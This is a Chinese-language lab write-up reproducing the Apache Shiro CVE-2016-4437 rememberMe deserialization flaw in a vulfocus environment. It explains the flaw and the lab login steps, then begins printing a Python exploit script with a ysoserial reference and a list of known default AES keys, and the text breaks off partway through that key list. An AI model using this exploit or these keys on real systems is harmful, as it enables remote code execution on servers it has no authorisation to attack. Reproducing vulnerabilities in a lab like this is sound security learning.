shiro-cve_2016_4437漏洞复现
漏洞概述:
该漏洞发布于2016年6月,属于java反序列化漏洞的一种,Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。
Shiro对rememberMe的cookie做了加密处理,shiro在CookieRememberMeManaer类中将cookie中rememberMe字段内容分别进行序列化、AES加密、Base64编码操作。只要rememberMe的AES加密密钥泄露,无论shiro是什么版本都会导致反序列化漏洞。使用Shiro的易于理解的API,可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。
漏洞复现:
在vulfocus平台上拉取下载shiro-cve_2016_4437漏洞镜像,并运行漏洞环境
在浏览器访问使用root用户登录,并勾选Remember ME,点击登录
登录成功
在GitHub上下载攻击exp
#! python2.7
import os
import re
import base64
import uuid
import subprocess
import requests
import sys
import json
import time
import random
import argparse
from Crypto.Cipher import AES
JAR_FILE = 'ysoserial.jar'
CipherKeys = [
"4AvVhmFLUs0KTA3Kprsdag==",
"3AvVhmFLUs0KTA3Kprsdag==",
"2AvVhdsgUs0FSA3SDFAdag==",
"6ZmI6I2j5